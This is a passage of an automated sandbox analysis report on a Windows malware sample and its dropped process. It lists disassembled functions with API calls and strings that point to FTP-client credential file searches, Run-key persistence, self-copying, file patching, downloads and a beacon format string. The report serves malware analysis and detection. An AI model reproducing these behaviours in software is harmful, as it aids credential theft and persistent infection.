Function 00407D61 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 81fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(00414F68,00000000,00000000,00000000,UniqueNum,00000001), ref: 00407E09
WriteFile.KERNEL32(00000078,00000064,00000001,00000000), ref: 00407E20

Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
Part of subcall function 00407CD7: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48

Strings

x, xrefs: 00407DEF
UniqueNum, xrefs: 00407D86

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: File$CreateModuleNamePointerWrite
String ID: UniqueNum$x
API String ID: 594998759-2399716736
Opcode ID: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
Instruction ID: 8c5cde1ed6458afa5e70834db293a7f07ca8c6efd1b8e13f0da2095665a79c5a
Opcode Fuzzy Hash: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
Instruction Fuzzy Hash: F72129329002186BDF04AB74ED49DDF3B69EF44315F104636FA02E71E1E634D951C799

Function 004040E7 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 60COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 0040413A

Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9

Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D

Strings

#, xrefs: 0040411E
&, xrefs: 00404110
*filezilla*, xrefs: 004040F6

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
String ID: #$&$*filezilla*
API String ID: 3438805939-758400021
Opcode ID: 7f420262a527ace9c0fec2a61cbcbac63df6dda7f3825d1df3812bb47b8bab04
Instruction ID: af0dd5899ef73ee7264a7e51d90439c8fcf38b6470501fb51340e8e2557856c3
Opcode Fuzzy Hash: 7f420262a527ace9c0fec2a61cbcbac63df6dda7f3825d1df3812bb47b8bab04
Instruction Fuzzy Hash: 8E1151B2901128BADB10EA92DC49EDF7BBCEF85304F00407AF605B6080E7385785CBE9

Function 00404A92 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 60COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 00404AE5

Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9

Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D

Strings

#, xrefs: 00404AC9
ftp*commander*, xrefs: 00404AA1
&, xrefs: 00404ABB

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
String ID: #$&$ftp*commander*
API String ID: 3438805939-1149875651
Opcode ID: 371d79112eeabe7a5308543586f4c365cccc6d4de9a1601f9ce447be0e8ea6cb
Instruction ID: 4761086559ade70d73b1403ca51e5d3bc462c500c99379e4fd01d7d946a964d6
Opcode Fuzzy Hash: 371d79112eeabe7a5308543586f4c365cccc6d4de9a1601f9ce447be0e8ea6cb
Instruction Fuzzy Hash: B61121B2901118BADB10AA92DC49EDF7F7CEF85704F00407AF609B6180E7799785CBA9

Function 00409445 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 004094A9
SysFreeString.OLEAUT32(?), ref: 004094AE

Strings

_blank, xrefs: 0040948E
an.yandex.ru/count, xrefs: 00409478

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: FreeString
String ID: _blank$an.yandex.ru/count
API String ID: 3341692771-25359924
Opcode ID: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
Instruction ID: 1eacecae91598e8b756cf85833a4a3bbf756f1dfdfc5fa02fd6c22f827bf3b29
Opcode Fuzzy Hash: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
Instruction Fuzzy Hash: 28015A35204114BBDB109FA6CD05D9B77A8EF85324724443BBC15E7291E779EE02CA69

Function 00407CD7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49fileCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
GetCurrentDirectoryW.KERNEL32(00001000,?,?,00407E44,00000001,UniqueNum), ref: 00407D15
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48

Strings

\merocz.xc6, xrefs: 00407D1B

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: File$CreateCurrentDirectoryModuleName
String ID: \merocz.xc6
API String ID: 3818821825-505599559
Opcode ID: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
Instruction ID: bb9f2ddab4bab237696810683399403c99d26191ea9c434de7a02090ea9b9a12
Opcode Fuzzy Hash: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
Instruction Fuzzy Hash: DA01A231904224ABE7309B569C49FEB77ADEF85710F00447FB505F20D1D6749A80CAAA

Function 00406C77 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 26registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Internet Explorer,00000000,00000001,00000000,?,?,00402C77), ref: 00406C91

Strings

SOFTWARE\Microsoft\Internet Explorer, xrefs: 00406C87
Build, xrefs: 00406CA6
w,@, xrefs: 00406CA0

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: Open
String ID: Build$SOFTWARE\Microsoft\Internet Explorer$w,@
API String ID: 71445658-3061378640
Opcode ID: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
Instruction ID: 930cfdd3d9e2cf302383723a85cc45ac24d6ba1b6d45bcf7a76994dd36721e6e
Opcode Fuzzy Hash: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
Instruction Fuzzy Hash: FBE08672664218FAEF009B929C07FDA77ACDB00758F20086AF502F10C1DAB5F714D6AC

Function 0040848F Relevance: 6.1, APIs: 4, Instructions: 81memoryregistryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5

Part of subcall function 0040845D: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000008,00000000,?,?,004084C5,?,?,?,00000008,?,00403796,?), ref: 00408475
Part of subcall function 0040845D: RegCloseKey.ADVAPI32(?,?,004084C5,?,?,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408484

ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408524
GetProcessHeap.KERNEL32(00000000,00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408534
HeapFree.KERNEL32(00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 0040853B

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: Heap$CloseEnvironmentExpandFreeOpenProcessQueryStringsValue
String ID:
API String ID: 3604167287-0
Opcode ID: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
Instruction ID: 704a8cbe2313c99ccb7bf4cac6d27c9c5720caa44ca6f9902b9fd9ccb38d811f
Opcode Fuzzy Hash: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
Instruction Fuzzy Hash: 0521C871900626BBDF205B748E45ABF3668EF05328F10063EF561F22D0EB758D508658

Function 00409581 Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

CharLowerW.USER32(00408E44,00000000,00000000,?,00408E44,00408795), ref: 004095A4
CharLowerW.USER32(00408795), ref: 004095D8
SysFreeString.OLEAUT32(00408795), ref: 00409608
SysFreeString.OLEAUT32(00408E44), ref: 0040960D

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: CharFreeLowerString
String ID:
API String ID: 2335467167-0
Opcode ID: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
Instruction ID: 6911929459278785efe31e607170db17e103bee024a9a22ae291265c1613d99e
Opcode Fuzzy Hash: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
Instruction Fuzzy Hash: 20116D72D00108BBDB019F9ADC85B9E7BB8EF44305F1544BAE405F21A1D779AE409F44

Function 00408091 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004081A3

Strings

-, xrefs: 00408140

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: -
API String ID: 885266447-2547889144
Opcode ID: b815d9a6725b7b7d4663accafdf12bc662ce9b6e2c1759233b63132321253c45
Instruction ID: cbf3f064ca1262f0759db58cdf0f181467b31290bd4ebff5f053a9a619aca6df
Opcode Fuzzy Hash: b815d9a6725b7b7d4663accafdf12bc662ce9b6e2c1759233b63132321253c45
Instruction Fuzzy Hash: 58415D31D0422699CB2177B98E417BB61A9DF44758F1440BFF9C0B72C2EEBC5D8581AE

Function 00409837 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 00409868
SysAllocString.OLEAUT32(?), ref: 00409876

Strings

"URL", xrefs: 00409838

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: AllocString
String ID: "URL"
API String ID: 2525500382-1734660058
Opcode ID: dde5973fb88290fc179560dd033cd143229de4e8b937af87662ad62248fcd5ae
Instruction ID: a1d8355846c3e17605cb56d648b2f311708773d78851072204e2f77cd01d539a
Opcode Fuzzy Hash: dde5973fb88290fc179560dd033cd143229de4e8b937af87662ad62248fcd5ae
Instruction Fuzzy Hash: E9F0A77650011997CF00AF64CC00ED637E9BB84348F0444B7E904E7240D974D9058F54

Function 004097BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 004097ED
SysAllocString.OLEAUT32(?), ref: 004097FB

Strings

"domain", xrefs: 004097BD

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: AllocString
String ID: "domain"
API String ID: 2525500382-3540696003
Opcode ID: 8e4162beac9bb0746109323da30f0d67e223eba2bd2c583220c59dcd4726db76
Instruction ID: 2ab7b57618223888890007651f958d72a6f850cfddda49e7e7e9e9b765f43e97
Opcode Fuzzy Hash: 8e4162beac9bb0746109323da30f0d67e223eba2bd2c583220c59dcd4726db76
Instruction Fuzzy Hash: AEF0A776500119ABCF00AF64CC04ED677E8BB84308F1444A7F908E7240EA7499058F50

Analysis Process: omsecor.exePID: 6524, Parent PID: 6792COMMON

Execution Graph

Execution Coverage:	6.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1143
Total number of Limit Nodes:	6

Executed Functions

Function 0040ABD9 Relevance: 3.0, APIs: 2, Instructions: 26
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040AC20: RegOpenKeyExW.KERNEL32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,74DF0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
Part of subcall function 0040AC20: RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72

FindFirstFileW.KERNEL32(?,00000000), ref: 0040AC03
FindClose.KERNEL32(00000000), ref: 0040AC0F

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: FindOpen$CloseFileFirst
String ID:
API String ID: 3155378417-0
Opcode ID: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
Instruction ID: fa0310e4c65bbc590993533f650c85f5e3ee77ef27cd51fa1c8f473dbf319076
Opcode Fuzzy Hash: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
Instruction Fuzzy Hash: 5DE0D87160C7044BE220E7B49D0C967B3DCAB45325F000F36A9B6E20C0FA38D46A465F

Function 0040B346 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 153
sleepfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B36C
GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B39D

Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(0040EA48,00000000,00000000,00000000,00000000,00020006,00000000,00000002,0040EA48,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22

GetLastError.KERNEL32(00000004), ref: 0040B3CA
Sleep.KERNEL32(00002710), ref: 0040B3F7
GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B413
CopyFileW.KERNEL32(?,?,00000000), ref: 0040B435
ExitProcess.KERNEL32 ref: 0040B44D

Part of subcall function 0040AC20: RegOpenKeyExW.KERNEL32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,74DF0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
Part of subcall function 0040AC20: RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72

GetLastError.KERNEL32(00000004), ref: 0040B48D
GetLastError.KERNEL32(00000004), ref: 0040B49A
ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 0040B4C7
GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B4D7
GetLastError.KERNEL32(00000004), ref: 0040B500

Strings

opeqmc.exe, xrefs: 0040B36E
/nomove, xrefs: 0040B4D9
IueiOod, xrefs: 0040B3A8
SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 0040B3AD

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: File$ErrorLastModuleName$Open$CopyCreateEnvironmentExitExpandProcessSleepStrings
String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$opeqmc.exe
API String ID: 3692109554-477663111
Opcode ID: a37a2c0829b51652c0125789b7ef107c293a8625708184dc08050438480bf6fc
Instruction ID: ccf8aad4361994264e72a39918ed7d53ff083e628d4a69ee62a5d407c68d8035
Opcode Fuzzy Hash: a37a2c0829b51652c0125789b7ef107c293a8625708184dc08050438480bf6fc
Instruction Fuzzy Hash: 8C4127719042186AE710B7A19D46FAB73ACEF04345F14447BBB05F11C2EB789A548AAF

Function 004075D4 Relevance: 22.6, APIs: 15, Instructions: 128
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
GetFileSize.KERNEL32(?,00000000), ref: 0040762E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407638
HeapAlloc.KERNEL32(00000000), ref: 0040763F
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00407660
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040767F
SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 00407691
ReadFile.KERNEL32(?,?,00000040,?,00000000), ref: 004076A1
SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 004076AF
ReadFile.KERNEL32(?,?,000000F8,?,00000000), ref: 004076C5
SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 004076EF
WriteFile.KERNEL32(?,?,000000F8,?,00000000), ref: 00407705
CloseHandle.KERNEL32(?), ref: 00407714
CloseHandle.KERNEL32(?), ref: 00407719

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: File$PointerRead$CloseCreateHandleHeapWrite$AllocProcessSize
String ID:
API String ID: 1458499590-0
Opcode ID: 93e258daf756a991a400698467a0f3e6930ee28086f0462060147eb388563e29
Instruction ID: 7ae3b020874f099f6a4231377d147a855b3f50186be4225f3fece46b7b724b47
Opcode Fuzzy Hash: 93e258daf756a991a400698467a0f3e6930ee28086f0462060147eb388563e29
Instruction Fuzzy Hash: F0416A71901028BADB209BA2DD48EEFBF7DEF45390F104476F619F21A0D7709A10DB64

Function 00409C99 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 127
memorynetworkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenUrlW.WININET(?,hOA,?,00000000,04400000,00000000), ref: 00409CCB
GetProcessHeap.KERNEL32(00000000,00002001,?,?,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF4
HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF7
InternetReadFile.WININET(?,?,00001000,?), ref: 00409D6E
GetProcessHeap.KERNEL32(00000000,00000002,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D80
HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D83
GetProcessHeap.KERNEL32(00000000,00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE3
RtlFreeHeap.NTDLL(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE6

Strings

hOA, xrefs: 00409CC5

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: Heap$Process$AllocInternet$FileFreeOpenRead
String ID: hOA
API String ID: 1355009786-3485425990
Opcode ID: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
Instruction ID: 638041e7f74e2b46c75c1535d5ef76f15aa532bf5b3977fbb34850ab96fc5943
Opcode Fuzzy Hash: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
Instruction Fuzzy Hash: 1B418B71900209FFEB119F65C844BAA7BA9FF44355F14847AF819E6292E778CE80CF54

Function 00406E69 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 130
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00406E78

Strings

From: , xrefs: 00406F8E
^key=, xrefs: 00406F2E
Via: , xrefs: 00406FAF
.html, xrefs: 00406F14
hOA, xrefs: 00406E7E
^nocrypt, xrefs: 00406F5C
0, xrefs: 00406EF5
Page generated at: , xrefs: 00407000
8@, xrefs: 00406ED2

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: CountTick
String ID: .html$0$8@$From: $Page generated at: $Via: $^key=$^nocrypt$hOA
API String ID: 536389180-1762329985
Opcode ID: 114e4e40ed3da380897df1d948c25e04c4e8011c16955a8b70e5daac7b5a3a86
Instruction ID: 73e0daeea7a9f5f4b783dd0519eebdf5205f1bdf48cad4214514e0173d2ce6b9
Opcode Fuzzy Hash: 114e4e40ed3da380897df1d948c25e04c4e8011c16955a8b70e5daac7b5a3a86
Instruction Fuzzy Hash: 27416131A0161997CB25EBA2DC51BDE7369FF44308F0044BFB909B71C1EA78AE948F59

Function 0040A786 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 121
sleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00002710,00000000,00000000,00000000), ref: 0040A7A3
Sleep.KERNEL32(0000EA60,?,00000000,00000000,00000000), ref: 0040A899
Sleep.KERNEL32(00002710,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8CC
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8E5
HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8EC

Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18

Strings

0, xrefs: 0040A848
confirm^rev=%s^code=%s^param=%s^os=%s, xrefs: 0040A7BA

Memory Dump Source

